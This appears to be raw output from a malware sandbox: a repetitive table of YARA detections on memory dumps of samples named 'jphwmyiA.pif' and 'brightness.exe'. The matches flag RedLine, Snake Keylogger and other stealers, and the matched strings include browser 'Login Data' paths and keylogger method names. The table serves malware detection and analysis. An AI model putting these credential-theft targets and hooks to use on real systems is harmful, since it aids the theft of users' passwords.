16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
13.2.Aiymwhpj.PIF.212333d8.7.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.brightness.exe.215f2418.11.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x84c10:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x67be0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x68260:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x868ea:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x86530:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x859e8:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
16.2.jphwmyiA.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
12.2.jphwmyiA.pif.28730ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.28730ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
12.2.jphwmyiA.pif.28730ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
16.2.jphwmyiA.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.1.jphwmyiA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.1.jphwmyiA.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
20.2.jphwmyiA.pif.2a0399de.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2a0399de.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2a0399de.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
20.2.jphwmyiA.pif.2c9b0ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2c9b0ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2c9b0ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
12.2.jphwmyiA.pif.25f2a8c6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2c9b0ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.25f2a8c6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
12.2.jphwmyiA.pif.25f2a8c6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
20.2.jphwmyiA.pif.2c9b0ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
12.2.jphwmyiA.pif.28730000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.28730000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.28730000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.28730000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.28730000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
12.2.jphwmyiA.pif.28730000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.28730000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
12.1.jphwmyiA.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
16.2.jphwmyiA.pif.1a1da8c6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1a1da8c6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2d020000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
16.2.jphwmyiA.pif.1a1da8c6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
